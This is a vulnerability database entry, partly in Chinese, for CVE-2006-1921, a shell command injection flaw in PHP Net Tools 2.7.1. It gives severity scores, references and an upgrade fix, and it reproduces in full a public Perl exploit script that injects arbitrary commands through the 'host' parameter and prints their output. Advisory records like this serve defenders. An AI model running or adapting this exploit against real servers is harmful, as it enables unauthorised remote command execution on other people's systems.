CVE-2006-1921
CVSS6.4
发布时间 :2006-04-20 14:06:00
修订时间 :2011-03-07 21:34:32
NMCOE    

[原文]nettools.php in PHP Net Tools 2.7.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter.


[CNNVD]PHP Net Tools Nettools.PHP 任意shell命令执行漏洞 (CNNVD-200604-341)

        PHP Net Tools 2.7.1中的nettools.php允许远程攻击者借助于host参数中的shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1921
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1921
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-341
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1420
(UNKNOWN)  VUPEN  ADV-2006-1420
http://secunia.com/advisories/19694
(VENDOR_ADVISORY)  SECUNIA  19694
http://milw0rm.com/exploits/1695
(UNKNOWN)  MILW0RM  1695
http://xforce.iss.net/xforce/xfdb/25941
(UNKNOWN)  XF  phpnettools-nettools-command-execution(25941)
http://www.securityfocus.com/bid/17601
(UNKNOWN)  BID  17601
http://www.attrition.org/pipermail/vim/2006-June/000839.html
(UNKNOWN)  VIM  20060609 [VIM] Update Regarding CVE-2006-1921 (fwd)

- 漏洞信息

PHP Net Tools Nettools.PHP 任意shell命令执行漏洞
中危 输入验证
2006-04-20 00:00:00 2006-04-24 00:00:00
远程  
        PHP Net Tools 2.7.1中的nettools.php允许远程攻击者借助于host参数中的shell元字符执行任意命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.hotscripts.com
        

- 漏洞信息 (1695)

PHP Net Tools <= 2.7.1 Remote Code Execution Exploit (EDBID:1695)
php webapps
2006-04-18 Verified
0 FOX_MULDER
N/A [点击下载]
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV<2) {
	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
	exit();
	}
	
	print "=======================================================\n";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
	print "fox_mulder@abv.bg\r\n";
	print "=======================================================\n";

	my $browser = LWP::UserAgent->new;
	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "\n\n[+]Sending request to server . . .\r\n";
	
	my $url = "http://$hostname$dir/nettools.php";

	
	my $response = $browser->post( $url,[
		'ping' => '1',
        	'host' => "|$command"]);

 	my $code = $response->status_line;
        print "[+] HTTP RESPONSE $code\n";
        print "\n[+]Injecting command . . .\n";
	$response->content =~ /blockquote>(.*)<\/blockquote>/s;
	print "$1\n";

# milw0rm.com [2006-04-18]
		

- 漏洞信息

24783
PHP Net Tools nettools.php host Variable Arbitrary Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-04-18 Unknow
2006-04-18 Unknow

- 解决方案

Upgrade to version 2.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站